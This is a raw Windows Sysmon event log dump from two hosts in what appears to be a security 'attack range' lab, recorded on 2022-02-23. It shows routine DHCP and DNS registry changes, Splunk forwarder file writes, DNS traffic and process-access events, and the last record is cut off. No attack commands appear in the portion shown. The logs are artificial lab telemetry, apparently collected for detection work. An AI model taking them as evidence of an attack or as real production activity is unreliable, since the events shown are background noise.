11:32:28.971{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4c272fe2-3d52-42c6-b049-7c4abef4d053}\LeaseTerminatesTimeDWORD (0x6216295c) 13241300x8000000000000000224087Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 11:32:28.971{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4c272fe2-3d52-42c6-b049-7c4abef4d053}\T2DWORD (0x6216279a) 13241300x8000000000000000224086Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 11:32:28.971{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4c272fe2-3d52-42c6-b049-7c4abef4d053}\T1DWORD (0x62162254) 13241300x8000000000000000224085Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 11:32:28.971{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4c272fe2-3d52-42c6-b049-7c4abef4d053}\LeaseObtainedTimeDWORD (0x62161b4c) 13241300x8000000000000000224084Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 11:32:28.971{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4c272fe2-3d52-42c6-b049-7c4abef4d053}\LeaseDWORD (0x00000e10) 13241300x8000000000000000224083Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 11:32:28.971{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4c272fe2-3d52-42c6-b049-7c4abef4d053}\DhcpServer10.0.1.1 13241300x8000000000000000224082Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 11:32:28.971{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4c272fe2-3d52-42c6-b049-7c4abef4d053}\DhcpSubnetMask255.255.255.0 13241300x8000000000000000224081Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 11:32:28.971{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4c272fe2-3d52-42c6-b049-7c4abef4d053}\DhcpIPAddress10.0.1.15 13241300x8000000000000000224080Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 11:32:28.971{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4c272fe2-3d52-42c6-b049-7c4abef4d053}\DhcpInterfaceOptionsBinary Data 23542300x8000000000000000224079Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:28.456{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3E30C7794BBD70950EF428F712566D5,SHA256=EACF02E374112558AAF13B6789C5615F99B01ABF096763FCC5991F693591D052,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300342Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:28.209{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A27FF43FAFAF309A3CFBA2349D6F9C4,SHA256=BD94809E3382F2C0059E0243775C7AC6473B9EF2C08D7C0C8B9D78E47356E989,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224097Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:29.565{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51643FD8BCEDBC49D048BB92B9F9EEDE,SHA256=C28DBD38C2206B027891A5B583A726F45384C0E79E35AE63260BB11BA26A9968,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300343Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:29.262{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9C1B2E163CDEE00008B448E3D4BF0B2,SHA256=F4567442EF89A26AC59F69C63008D9F110D4C1BE8F4A8ABC01C9BE1EB81548CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224104Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:30.596{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A37AA2CE762336170DC53FE9BD8D79F,SHA256=1FA0683FD6B12B4C4AA0BF717CDBB59726131A62D076DB12EFD4908C40BE170E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300344Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:30.277{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FC2AFF9DDD0CB3922062EAA55F2C2E2,SHA256=5523FE2470AB72027A6C374FDAAE7EBC4D7CCF625DD899A9D2F0F8FD76B0C2F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224103Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:30.549{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=C1708F6146888A5C57D51094B0258FE4,SHA256=5047167775712BC67888093FF8D463DBDEB091891681030C46DEC121F96966D9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000224102Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:28.456{4F8D34B0-F11C-6215-1600-000000003902}1192C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10f:0:0:98a0:648:8cbc:ffff-53755-truee000:fc:108d:0:f88f:0:10a1:200-5355llmnr 354300x8000000000000000224101Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:28.456{4F8D34B0-F11C-6215-1600-000000003902}1192C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:ad4f:96:d14b:8b64win-host-tcontreras-attack-range-985.eu-central-1.compute.internal53755-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x8000000000000000224100Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:28.429{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal68bootpcfalse10.0.1.1ip-10-0-1-1.eu-central-1.compute.internal67bootps 23542300x8000000000000000224099Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:30.049{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=A1292EC45108F0C55C221626B3608993,SHA256=3665CB8FE93F9D16CB6B182E605B9E6FC75917B213EE61A3DE88820B65C68AB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224098Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:30.049{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=70F6C6B6A6FEC152CB470B6309065852,SHA256=48F5D051AB53E543EF50D9CAFFBDAECCB4EE0361351CE6F656FED4F78713B878,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224106Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:31.627{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97F73165EF750A8FE444B6CB5527C377,SHA256=76DF3EF5E24FAC146E29D9D4D283B223C120AE49387BD6EE26FA49EB57435D40,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300346Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:30.187{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domainfalse10.0.1.15WIN-HOST-TCONTR52158- 23542300x8000000000000000300345Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:31.277{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D619A88E87B55B30F9FBF4C92E0E6382,SHA256=1788A384CC5CCAD588B76C52E038199CED53C398E4CD8E70AB32BB4487C86DA1,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000224105Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-SetValue2022-02-23 11:32:31.362{4F8D34B0-F11C-6215-1400-000000003902}92C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d828a9-0x0b6bba52) 23542300x8000000000000000224110Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:32.690{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95AF8AEE3E767785378435EC8CB14564,SHA256=51D9507CF7A0551CA1540B7FDD59EF10ED76E54100533ECBD0D6B48FF355B8C0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300362Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:30.620{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49716-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000300361Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:32.829{C8EA50B7-F11F-6215-1000-000000003802}3645132C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300360Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:32.829{C8EA50B7-F11F-6215-1000-000000003802}3645132C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000300359Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:32.308{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4AABDA0D6038EE492AB5736A96AB2B5,SHA256=8F6AC741A1E988AD83B7879E125E789A5667AE2A638B05E1E98652134F10BAFB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000224109Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:30.523{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51832-false10.0.1.12-8000- 354300x8000000000000000224108Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:30.200{4F8D34B0-F11C-6215-1600-000000003902}1192C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal52158-false10.0.1.14-53domain 354300x8000000000000000224107Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:30.195{4F8D34B0-F11C-6215-1600-000000003902}1192C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10f:0:0:98a0:648:8cbc:ffff-52158-truea00:10e:0:0:0:0:0:0-53domain 13241300x8000000000000000300358Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:32:32.076{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{0b32caae-ed4e-4625-847f-64846c7677e5}\DhcpConnForceBroadcastFlagDWORD (0x00000000) 13241300x8000000000000000300357Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:32:32.076{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{0b32caae-ed4e-4625-847f-64846c7677e5}\IsServerNapAwareDWORD (0x00000000) 13241300x8000000000000000300356Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:32:32.076{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{0b32caae-ed4e-4625-847f-64846c7677e5}\AddressTypeDWORD (0x00000000) 13241300x8000000000000000300355Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:32:32.076{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{0b32caae-ed4e-4625-847f-64846c7677e5}\LeaseTerminatesTimeDWORD (0x62162960) 13241300x8000000000000000300354Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:32:32.076{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{0b32caae-ed4e-4625-847f-64846c7677e5}\T2DWORD (0x6216279e) 13241300x8000000000000000300353Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:32:32.076{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{0b32caae-ed4e-4625-847f-64846c7677e5}\T1DWORD (0x62162258) 13241300x8000000000000000300352Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:32:32.076{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{0b32caae-ed4e-4625-847f-64846c7677e5}\LeaseObtainedTimeDWORD (0x62161b50) 13241300x8000000000000000300351Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:32:32.076{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{0b32caae-ed4e-4625-847f-64846c7677e5}\LeaseDWORD (0x00000e10) 13241300x8000000000000000300350Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:32:32.076{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{0b32caae-ed4e-4625-847f-64846c7677e5}\DhcpServer10.0.1.1 13241300x8000000000000000300349Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:32:32.076{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{0b32caae-ed4e-4625-847f-64846c7677e5}\DhcpSubnetMask255.255.255.0 13241300x8000000000000000300348Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:32:32.076{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{0b32caae-ed4e-4625-847f-64846c7677e5}\DhcpIPAddress10.0.1.14 13241300x8000000000000000300347Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:32:32.076{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{0b32caae-ed4e-4625-847f-64846c7677e5}\DhcpInterfaceOptionsBinary Data 23542300x8000000000000000224111Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:33.692{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80FA449CE4843C9B6B0C9EBDB0245C88,SHA256=8EE3EC934006523B4B3DF6E2112241597CB5DEB77820CDE6BA03466C541BF012,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300366Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:33.725{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=6AD581A2A60CD812D65B5F4BE6DD6E5A,SHA256=D3073F69FFBFEFDA0657C33119CD09C1093A0C4D7195C186C6E9FAC4F082B5DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300365Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:33.331{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=438A2B86DCFB7FE6105D7E0D9E8D389F,SHA256=54ACCE6044749056465D7C420AFF621EE79A81DB4E3965AC20192C8548091327,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000300364Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:33.107{C8EA50B7-F11D-6215-0B00-000000003802}6286044C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300363Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:33.107{C8EA50B7-F11D-6215-0B00-000000003802}6286044C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000224112Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:34.708{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AE7B2D35C48432F25916A349C332C30,SHA256=3967141DB6DD01C030AB3620B101798326899BC0E0A10A28D2E1B631187D4B53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300382Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:34.344{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B33C96A8A0769D68CFC140B6928E85C4,SHA256=1A087F334B4C393D41B9B89A6EF606D091AF07A59E2A50BB51C997964A9DD465,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000300381Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:32:34.129{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{0B32CAAE-ED4E-4625-847F-64846C7677E5}\RegisteredSinceBootDWORD (0x00000001) 13241300x8000000000000000300380Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:32:34.129{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{0B32CAAE-ED4E-4625-847F-64846C7677E5}\StaleAdapterDWORD (0x00000000) 13241300x8000000000000000300379Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:32:34.129{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{0B32CAAE-ED4E-4625-847F-64846C7677E5}\CompartmentIdDWORD (0x00000001) 13241300x8000000000000000300378Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:32:34.129{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{0B32CAAE-ED4E-4625-847F-64846C7677E5}\FlagsDWORD (0x00000002) 13241300x8000000000000000300377Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 